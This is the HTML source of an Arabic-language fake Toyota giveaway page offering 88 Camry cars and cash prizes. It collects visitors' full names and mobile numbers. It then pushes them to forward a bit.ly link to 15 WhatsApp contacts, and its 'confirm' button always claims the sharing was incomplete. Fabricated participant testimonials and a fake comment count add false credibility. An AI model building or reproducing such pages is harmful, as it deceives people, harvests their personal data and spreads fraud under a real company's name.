<html><head>
<meta property="og:title" content="مسابقة تويوتا - اليوم العربي" />
	<meta property="og:type" content="website" /> 
	<meta property="og:url" content="http://www.toyota.com" />
	<meta property="og:image" content="https://i.imgur.com/xAr9etL.png" />
	<meta property="og:description" content="۸۸ سيارة كامري وجوائز نقدية وقيمة في إنتظاركم" />
	<link rel="image_src" href="http://i.imgur.com/MFLZzLQ.png" />
	<meta property="og:image" content="https://i.imgur.com/xAr9etL.png" />
	<meta name="twitter:image:src" content="https://i.imgur.com/xAr9etL.png">
	<meta name="twitter:image" content="https://i.imgur.com/xAr9etL.png">


</head><body>
<div style="width: 100%;margin:0 auto;">
<div align="center" style="">

</div>

<body bgcolor="#21502d"></body>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0">   
<title>تويوتا - اليوم العربي</title>
<link href="//fonts.googleapis.com/earlyaccess/droidarabicnaskh.css" rel="stylesheet">
<link href="//fonts.googleapis.com/css?family=Titillium+Web:400,300,600,700" rel="stylesheet" type="text/css">



	


  <script>
if (!confirm("مرحباً بك\n  في مسابقة شركة تويوتا \n بمناسبة #اليوم_العربي \n\n إضغط ( موافق ) للمشاركة معنا"))
window.location=history()
</script>





<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.0/jquery.min.js"></script>

<script src='/script.js'></script>





<meta property="og:description" content="إضغط هنا !">
<meta content="http://www.lexus.com.sa/assets/images/global/favicon.png" name="og:image">
<link href="http://www.lexus.com.sa/assets/images/global/favicon.png" rel="shortcut icon">
<style>
*, :before, :after {
    box-sizing: border-box
}
html {
    height: 100%
}
body {
    background-size: cover;
    color: #000;
    direction: rtl;
    font-family: droid arabic naskh , Titillium Web;
}
h1, h2, h3, h4 {
    font-weight: 400
}
h1 {
    font-size: 1.4em;
    line-height: 1em
}
#date {
    color: white;
    margin-right: 15px;
}
h1 {
    font-size: 24px;
	text-align:center;
}
h2 {
    font-size: 1.3em;
	text-align: center;
}
#wrapper {
    height: 100%;
    width: 100%
}
#intro {
    font-size: 1px
}
#questionWrapper {
    background: none repeat scroll 0 0 #fff;
    width: 92%;
    min-height: 460px;
    margin: 5px auto;
    padding: 20%;
    border-radius: 15px;
    box-sizing: border-box;
    max-width: 985px;
}
.answer {
    text-transform: uppercase;
    display: block;
    margin-bottom: 10px;
    font-size: 1em;
    color: #000;
    border: 2px solid #000;
    background: none repeat scroll 0 0 rgba(224, 232, 139, 0.7);
    text-decoration: none;
    text-align: center;
    width: 100%;
    padding: 7px 0
}
.result {
    display: none
}
.check1 { display:none; text-align: center;}
.check2 { display:none;}
.check3 { display:none;}
.check4 { display:none;}
.check5 { display:none;}
.question1 { display:none;}
.question2 { display:none;}
.question3 { display:none;}
.question4 { display:none;}
.lastMargin {
    height: 5px
}
.alpha60 {
    background: none repeat scroll 0 0 rgba(0, 0, 0, 0.6)
}
img.loader {
    clear: both;
	text-align:center;
    margin: 0 0 10px;
}
.one1 {display:none;}
.one2 {display:none;}
.one3 {display:none;}
.check {
    clear: both
}
.checkItem {
    clear: both;
    overflow: auto
}
.checkItem span.img {
    vertical-align: middle;
    display: table-cell;
    padding-right: 10px
}
.checkItem span.img img {
    display: block
}
.checkItem h3 {
    vertical-align: middle;
    display: table-cell;
    padding: 0;
    margin: 0
}
a.callToAction {
    background: none repeat scroll 0 0 #3e7f1b;
    background-imageborder: 1px solid rgba(0, 0, 0, 0.2);
    color: #fff;
    display: block;
    font-size: 20px;
    padding: 10px 20px;
    text-decoration: none;
    text-shadow: 1px 1px 1px rgba(0, 0, 0, 0.5);
    text-align: center;
    width: 80%;
    border-radius: 30px;
    box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;
    background-image: -webkit-gradient(linear, left top, left bottom, color-stop(0, #79B85E), color-stop(1, #4C8F28));
    background-image: -o-linear-gradient(bottom, #79B85E 0%, #4C8F28 100%);
    background-image: -moz-linear-gradient(bottom, #79B85E 0%, #4C8F28 100%);
    background-image: -webkit-linear-gradient(bottom, #79B85E 0%, #4C8F28 100%);
    background-image: -ms-linear-gradient(bottom, #79B85E 0%, #4C8F28 100%);
    background-image: linear-gradient(to bottom, #79B85E 0%, #4C8F28 100%);
}
a.callToAction:hover {
    text-decoration: underline
}
.countWrapper {
    display: block;
    clear: both;
    font-size: 12px;
    margin: 5px
}
.centerIt {
    margin: 0 auto;
    text-align: center
}
.centerIt a {
    margin: 0 auto
}
.cta {
    margin-bottom: 14px;
    cursor:pointer;
}
#header {
    color: #000;
    height: 85px;
    margin: 0 auto;
    max-width: 985px;
    padding: 0 0 6px;
    position: relative;
    width: 100%
}
#logo {
    height: 85px;
    float: left;
    width: 300px
}
#date {
    font-size: 16px;
    font-weight: 700;
    position: absolute;
    right: 10px;
    top: 62px;
    color: #fff
}
audio:not([controls]) {
    display: none;
    height: 0
}
html {
    font-family: droid arabic naskh , Titillium Web;
}
body {
    margin: 0
background: #154dc6;
}
a {
    background: none repeat scroll 0 0 transparent
}
a:focus {
    outline: thin dotted
}
a:active, a:hover {
    outline: 0 none
}
b, strong {
    font-weight: 700
}
img {
    border: 0 none
}
svg:not(:root) {
    overflow: hidden
}
button::-moz-focus-inner, input::-moz-focus-inner {
    border: 0 none;
    padding: 0
}
.red {
    color: #fd0c25
}
.likebar {
    font-size: 13px;
    margin: 5px 5px 0 0;
    float: right;
    color: #7F7F7F
}
.likebar:not-children {
    font-size: 20px
}
.fbblue {
    color: #3b5998
}
.likes {
    background-position: left center;
    background-repeat: no-repeat;
    background-image: url(../img/like.png);
    padding-left: 17px
}
.valid {
    font-size: 12px;
    margin: 5px 0;
    color: #616161
}
@media screen and (max-width: 420px) {
    .checkItem h3 {
        font-size: 11px
    }
    #date {
        font-size: 10px
    }
}
h2 {
    margin-top: 10px
}
.content_sec {
    width: 100%;
    padding: 0;
    margin: 0;
    background: #fff;
    border-radius: 10px
}
.content_inn {
    padding: 30px;
    overflow: auto
}
.content_sec h1 {
    width: 100%;
    float: left;
    padding: 0 0 10px;
    margin: 0 0 10px;
    font-size: 24px;
    color: #000;
    font-weight: 400;
    border-bottom: 1px solid #eaeaea
}
.content_sec h2 {
    width: 100%;
    float: lzft;
    padding: 0 0 10px;
    margin: 0 0 20px;
    font-size: 24px;
    color: #818181;
    font-weight: 400;
    border-bottom: 1px solid #eaeaea;
	text-align: left;
}
.detail_block {
    width: 100%;
    float: left;
    padding: 0 0 15px;
    margin: 0 0 15px;
    border-bottom: 1px solid #eaeaea
}
.detail_left {
    width: 133px;
    float: left;
    padding: 0;
    margin: 0 22px 0 0
}
.detail_left img {
    width: 100%;
    max-width: 133px;
    height: auto
}
.detail_right {
    overflow: hidden;
	text-align: right
}
.detail_right h3 {
    width: 100%;
    float: left;
    padding: 0;
    margin: 0 0 10px;
    font-size: 24px;
    color: #3b5998;
    font-weight: 400
}
.detail_right h3 a {
    color: #3b5998
}
.detail_right h3 a:hover {
    color: #5f7dbc
}
.detail_right p {
    width: 100%;
    float: left;
    padding: 0;
    margin: 0 0 10px;
    font-size: 24px;
    color: #000;
    line-height: normal
}
.detail_right span {
    width: 100%;
    float: left;
    padding: 0;
    margin: 0 0 10px;
    font-size: 20px;
    color: #818181
}
@media (max-width: 480px) {
    html {
        -webkit-text-size-adjust: none
    }
    #logo {
        max-width: 70%;
        height: auto
    }
    .wrapper {
        padding: 0
    }
    .content_inn {
        padding: 0
    }
    .content_sec h1 {
        font-size: 15px
    }
    .content_sec h2 {
        font-size: 15px
    }
    .detail_left {
        width: 70px;
        margin: 0 10px 0 0
    }
    .detail_right h3 {
        font-size: 15px;
        font-weight: 700;
        text-decoration: none
    }
    .detail_right p {
        font-size: 13px
    }
    .detail_right span {
        font-size: 12px
    }
}
.container {
    width: 960px;
    margin: 0 auto;
    padding: 0
}
.content_sec {
    width: 100%;
    float: left;
    padding: 0;
    background: #fff;
    border-radius: 10px
}
.content_inn {
    padding: 30px
}
.content_sec h1 {
    width: 100%;
    float: left;
    padding: 0 0 10px;
    margin: 0 0 10px;
    font-size: 24px;
    color: #000;
    font-weight: 400;
    border-bottom: 1px solid #eaeaea
}
.content_sec h2 {
    width: 100%;
    float: left;
    padding: 0 0 10px;
    margin: 0 0 20px;
    font-size: 24px;
    color: #818181;
    font-weight: 400;
    border-bottom: 1px solid #eaeaea
}
.detail_block {
    width: 100%;
    float: left;
    padding: 0 0 20px;
    margin: 0 0 20px;
    border-bottom: 1px solid #eaeaea
}
.detail_left {
    width: 133px;
    float: right;
    padding: 0;
    margin: 0 0 0 10px;
}
.detail_left img {
    width: 100%;
    max-width: 133px
}
.detail_right {
    overflow: hidden;
    font-family: arial;
}
.detail_right h3 {
    width: 100%;
    float: left;
    padding: 0;
    margin: 0 0 10px;
    font-size: 24px;
    color: #3b5998;
    font-weight: 400
}
.detail_right h3 a {
    color: #3b5998
}
.detail_right h3 a:hover {
    color: #5f7dbc
}
.detail_right p {
    width: 100%;
    float: left;
    padding: 0;
    margin: 0 0 10px;
    font-size: 24px;
    color: #000;
    line-height: normal
}
.detail_right span {
    width: 100%;
    float: left;
    padding: 0;
    margin: 0 0 10px;
    font-size: 20px;
    color: #818181
}
@media (max-width: 480px) {
    html {
        -webkit-text-size-adjust: none
    }
    .wrapper {
        padding: 20
    }
    .content_inn {
        padding: 20
    }
    .content_sec h1 {
        font-size: 15px
    }
    .content_sec h2 {
        font-size: 15px
    }
    .detail_left {
        width: 90px;
        margin: 0 0 0 10px
    }
    .detail_right h3 {
        font-size: 15px;
        font-weight: 700
    }
    .detail_right p {
        font-size: 13px
    }
    .detail_right span {
        font-size: 12px
    }
}
.hide {
    display: none
}
.red {
    color: red
}
.centerIt div {
    margin: 0 auto;
}
div.callToAction1 {
    background: #435a8b linear-gradient(to bottom, #435a8b 0%, #435a8b 100%) repeat scroll 0 0;
    background-imageborder: 1px solid rgba(0, 0, 0, 0.2);
    color: #fff;
    display: block;
    font-size: 18px;
    padding: 10px 20px;
    cursor:default;
    text-decoration: none;
    text-shadow: 1px 1px 1px rgba(0, 0, 0, 0.5);
    text-align: center;
    width: 80%;
    border-radius: 30px;
    box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;
    background-image: -webkit-gradient(linear, left top, left bottom, color-stop(0, #435a8b), color-stop(1, #4C8F28));
    background-image: -o-linear-gradient(bottom, #435a8b 0%, #435a8b 100%);
    background-image: -moz-linear-gradient(bottom, #435a8b 0%, #435a8b 100%);
    background-image: -webkit-linear-gradient(bottom, #435a8b 0%, #435a8b 100%);
    background-image: -ms-linear-gradient(bottom, #435a8b 0%, #435a8b 100%);
    background-image: linear-gradient(to bottom, #435a8b 0%, #435a8b 100%);
    cursor:pointer;
}
#intro {
    font-size: 13px;
	text-align: center;
}
#intro2 {
    font-size: 13px;
	text-align: center;
}
#intro4 {
    font-size: 13px;
	text-align: center;
	display: none;
}
* {
    text-decoration: initial;
}
#questionWrapper {
    padding: 0.5% 5%;
}
u {
    text-decoration: underline;
}
#top-ribbon {
    background: black;
    color: white;
    padding: 10px;
    font-size: 10px;
    border-bottom: 1px solid white;
}
.center {
    text-align: center;
}
#iframe {
    display: none;
    maxrgin-top: 45px;
}
#iframe iframe {
    border: 0px;
    overflow: hidden;
    height: 800px;
}
#iframe h1 {
    text-align: center;
    font-family: droid arabic naskh;
    font-weight: bold;
    color: #ffea00
}
#iframe h1 span {
    color: white;
}
.text {
    margin: 0 auto;
    background: #3e3c3d;
    color: #fff;
    padding: 10px;
    text-align: center;
    border-radius: 20px;
    max-width: 500px;
}
.answer, .prepopulate .submit {
    display: block;
    margin-bottom: 10px;
    font-size: 1.1em;
    font-weight:bold;
    border: 2px solid black;
    background: none repeat scroll 0 0 #feb10e;
    color: black;
    text-decoration: none;
    text-align: center;
    width: 100%;
    padding: 9px 0;
    letter-spacing: 1px;
    text-transform: none !important;
    border: none;
    border-radius: 15px;
    background-color: #097440;
    color: #fff;
    transition: color, background-color 0.1s ease-in-out !important;
}
.prepopulate .txt {
    border: 1px solid #37B06D !important;
}
#date {
    color:black;
    font-weight:normal;
    float:right;
}
.responsive {
    max-width:100%;
    max-height:100%;
}
.phone-header {
    background: #525252;
    padding:10px;
}
.intro {
    width:100%;
    margin:auto;
    text-align:center;
}
.pre-text p,.intro h3 {
    font-size:15px;
}
@media screen and (max-width: 414px) {
    h1 {
        font-size:25px;
    }
    .lang-fr h1 {
        font-size:20px;
    }
}
@media screen and (max-width: 375px) {
    h1 {
        font-size:22px;
    }
}
@media screen and (max-width: 360px) {
    h1 {
        font-size:16px;
    }
    .lang-fr h1 {
        font-size:14px;
    }
    .lang-es h1 {
        font-size:15px;
    }
    .lang-cs h1 {
        font-size:15px;
    }
    .lang-nl h1 {
        font-size:16px;
    }
    .lang-fi h1 {
        font-size:16px;
    }
    .lang-sv h1 {
        font-size:15px;
    }
    .lang-hu h1 {
        font-size:15px;
    }
    .lang-pt h1 {
        font-size:15px;
    }
}
@media screen and (max-width: 320px) {
    .intro {
        text-align:center;
    }
    .intro img {
        max-height:120px;
        margin:0px auto;
    }
    #questionWrapper {
        padding:4px;
        padding-top:0px;
        margin-left:10px;
        margin-rightx:5px;
    }
    .pre-text p,.intro h3 {
        font-size:15px;
    }
    h2 {
        font-size:17px;
    }
    h1 {
        font-size:18px;
    }
    .lang-es h1 {
        font-size:16px;
    }
    .lang-fr h1 {
        font-size:20px;
    }
}
.button {
text-decoration: none;
background:#235ece;
color: #fff;
border: 2px solid #fff;
display:inline-block;
position:relative;
margin:11px 5px;
padding: 10px 35px;
    border-radius: 15px;
transition:all 0.4s ease
}
.button:hover {
 background:#d42308;
color: #fff;
cursor: pointer;
}
.overlay {
  position: fixed;
  top: 0;
  bottom: 0;
  left: 0;
  right: 0;
  background: rgba(0, 0, 0, 0.7);
  transition: opacity 500ms;
  visibility: hidden;
  opacity: 0;
}
.overlay:target {
  visibility: visible;
  opacity: 1;
}
.popup {
  margin: 70px auto;
  padding: 20px;
  background: #fff;
  color: red;
  border-radius: 5px;
  max-width: 420px;
  position: relative;
  transition: all 5s ease-in-out;
  overflow-x: hidden;
}
.popup h2 {
  margin-top: 0;
color: #000;
height: 30px;
}
.popup .close {
position: absolute;
top: 0px;
right: 20px;
transition: all 200ms;
font-size: 30px;
font-weight: bold;
text-decoration: none;
color: #333;
}
.popup .close:hover {
  color: #06D85F;
}
.popup .content {
  max-height: 30%;
  overflow-y: hidden;
}
</style>




<div class="main section" id="main">
</div>
<!-- Please Keep The Credits -->


<div id="wrapper">
    <div id="questionWrapper" class="alpha60">

        <div class="intro">



<div class="ads1">

</div>
        </div>


        <div class="pre-text">
            <div id="intro">

<img src="https://i.imgur.com/pNDeRqX.png" alt="Pandaبنده ‏" class="responsive" style="
    border-radius: 20px;
">

            <h2 style="color: #235791;font-size: 22px;font-weight: bold;margin: 5px 0 0;"></h2>		
            </div>
        </div>


<div class="question1" style="display: block;">
    <span style="color:#00623F;"><h2></h2></span>
<a href="#">
<center><img src="https://i.imgur.com/nFLGWSQ.png"></center>
</a>
</div>		
<div class="question2">
<span style="color:#d8142c;"><h2>أدخل أسمك بالكامل</h2></span>
<center>
<input type="text" placeholder="      الأسم      " id="phonee" name="Phone" style="fontwidth: 210px;height: 56px;font-size: 25px;width: 280px;" onkeypress="return numberonly(event);">
</center>
<br>
    <a class="answer" href="#">التالي</a>

</div>
<div class="question3">
   <span style="color:#d8142c;"><h2>أدخل رقم جوالك بشكل صحيح</h2></span>
<center>
<input type="tel" placeholder="      (0XXXXXXXX)      " id="phonee" name="Phone" style="fontwidth: 210px;height: 56px;font-size: 25px;width: 280px;" onkeypress="return numberonly(event);">
</center>
<br>
    <a class="answer" href="#">التالي</a>

</div>
<div class="question4">
    <span style="color:#d8142c;"><h2>من أين سمعت عن مسابقتنا ؟</h2></span>
    <a class="answer" href="#">عن طريق صديق</a>
    <a class="answer" href="#">وسائل التواصل الإجتماعي</a>

</div>

<div class="checker">
    <div class="check1">


<h2 style="color: #000000;font-size: 20px;font-weight: bold;margin: 5px 0 0;"></h2><br>
        <center><img src="https://i.imgur.com/ezmIlok.gif" class="loader">
<br>
</center> 

</center>    

</div></center>
<br>


    <div class="check2">


        <div class="share-section">

            <h2 style="color: #ff0e23;font-size: 35px;font-weight: bold;margin: 5px 0 0;"></h2>
<center><img src="https://gatesbbq.com/wp-content/uploads/2017/04/checkmark.png" class="LOGO">
			<h2> لم يتبقى لك سوى خطوة واحدة <span style="color:#db3426;"><b> لدخول السحب </b></span></h2>
<div id="intro">


            <h2 style="color: #323232;font-size: 13px;font-weight: bold;margin: 5px 0 0;"><b>اضغط على الزر الاخضر الموجود في الأسفل وارسل دعوة لـ 15 شخص او مجموعة على الـ WhatsApp
</b></h2>
</div>






<center>
<div class="whatsent">
<a href="whatsapp://send?text=
شركة تويوتا تعلن عن مسابقتها السنوية ، سارع وأدخل السحب على واحدة من 88 سيارة تويوتا كامري موديل 2018 وجوائز نقدية وقيمة ستيم إعلان أسماء الفائزين بتاريخ 13/01/1440 هـ ، سارع بالتسجيل من هنا : http://bit.ly/Toyota-Gifts
" data-action="share/whatsapp/share">
<img src="https://i.imgur.com/o9gCQEH.png" height="45" border="0" align="middle" width="260" style="
    margin-top: 20px;
"></a>
</div>
</center>


<div id="intro2">
<p><b>بعد الإنتهاء من نشر الدعوة قم بالضغط على " تأكيد " ستصلك رسالة على جوالك بتأكيد تسجيلك في السحب</b>
</div>


            <h2 style="color: #D3000A;font-size: 13px;font-weight: bold;margin: 5px 0 0;">ملاحظة : سيتم إعلان أسماء الفائزين والتواصل معهم بتاريخ : 13/01/1440هـ</h2>
   


<br>

<center><a class=" target="_blank" onclick="alert('للأسف لم تقم بنشر الرسالة لـ 15 شخص على الواتس أب , نرجو بإعادة الخطوات بشكل صحيح')"><img src="https://i.imgur.com/fAeHbkO.png" alt="تأكيد"></center>
<br>
</div>
    </div>
</div>        
<div class="wrapper testimonials" style="display:none;">
    <div class="content_sec">
        <div class="content_inn">
		<h1>تعليقات المشاركين في مسابقتنا</h1>
            <h2>22,793 تعليقات</h2>
            <div class="detail_block">
                <div class="detail_left"><a href="#" target="_blank"><img src="https://i.imgur.com/LD180eq.jpg" width="133"></a>
                </div>
                <div class="detail_right">
                    <h3><a>Hofaa Alamora</a></h3>
<p>يارب أفوز تم تسجيل بنجاح كل عام والوطن العربي بألف خير #اليوم_العربي</p>
                </div>
        <span class="likebar">   <a class="fbblue" href="javascript:void(0);">Reply</a> ·
            <a class="fbblue smaller" href="javascript:void(0);">Like</a> ·
            <span class="fbblue likes">29</span> ·
            <span>at 10:54 pm</span>
            </span></div>
            <div class="detail_block">
                <div class="detail_left"><a href="#" target="_blank"><img src="https://i.imgur.com/41t6uW2.jpg" width="133"></a>
                </div>
                <div class="detail_right">
                    <h3><a>ندى بنت خالد</a></h3>
                    <p> ياااارب افووووز #</p>
                </div>
        <span class="likebar">   <a class="fbblue" href="javascript:void(0);">Reply</a> ·
            <a class="fbblue smaller" href="javascript:void(0);">Like</a> ·
            <span class="fbblue likes">22</span> ·
            <span>at 4:18 pm</span>
            </span></div>
            <div class="detail_block">
                <div class="detail_left"><a href="#" target="_blank"><img src="https://i.imgur.com/jH1IZxO.jpg" width="133"></a>
                </div>
                <div class="detail_right">
                    <h3><a>Haya Ahmed</a></h3>
                    <p>شكرا تويوتا تم تسجيل اسمي يارب أكون من الفائزين  </p>
                </div>
         <span class="likebar">   <a class="fbblue" href="javascript:void(0);">Reply</a> ·
             <a class="fbblue smaller" href="javascript:void(0);">Like</a> ·
             <span class="fbblue likes">17</span> ·
             <span>at 10:14 am</span>
            </span></div>
            <div class="detail_block">
                <div class="detail_left"><a href="#" target="_blank"><img src="https://i.imgur.com/EWwUj1B.jpg" width="133"></a>
                </div>
                <div class="detail_right">
                    <h3><a>رائد المقاطي</a></h3>
                    <p>كل عام والوطن العربي بخير ان شاء الله يحالفني الحظ</p>
                </div>
        <span class="likebar">   <a class="fbblue" href="javascript:void(0);">Reply</a> ·
            <a class="fbblue smaller" href="javascript:void(0);">Like</a> ·
            <span class="fbblue likes">14</span> ·
            <span>at 3:33 am</span>
            </span></div>
            <div class="detail_block">
                <div class="detail_left"><a href="#" target="_blank"><img src="https://i.imgur.com/wi4jOod.jpg" width="133"></a>
                </div>
                <div class="detail_right">
                    <h3><a>سعود القحطاني</a></h3>
                    <p>شكرا على المسابقة يارب اربح كامري ياااارب</p>
                </div>
        <span class="likebar">   <a class="fbblue" href="javascript:void(0);">Reply</a> ·
            <a class="fbblue smaller" href="javascript:void(0);">Like</a> ·
            <span class="fbblue likes">13</span> ·
            <span>at 12:34 am</span>
            </span></div>
            <div class="detail_block">
                <div class="detail_left"><a href="#" target="_blank"><img src="https://i.imgur.com/oxyN9o9.jpg" width="133"></a>
                </div>
                <div class="detail_right">
                    <h3><a>محمد بن سلطان</a></h3>
                    <p>شكرا تويوتا يارب أربح تويوتا </p>
                </div>
        <span class="likebar">   <a class="fbblue" href="javascript:void(0);">Reply</a> ·
            <a class="fbblue smaller" href="javascript:void(0);">Like</a> ·
            <span class="fbblue likes">6</span> ·
            <span>11:01 am</span>
            </span></div>
        </div>
<center>
</center>
<br>
<center>
<center>
<a href="#" target="_blank">المزيد من خدمات</a>
</center>
    </center></div>
</div>
    </div>
    </div>
<div id="conversion-container"></div>
<a style="display: none">
<script id="_wauars">var _wau = _wau || []; _wau.push(["dynamic", "alalsiiii5", "ars", "c4302bffffff", "small"]);</script><script async src="//waust.at/d.js"></script>
</a>
</body></html>
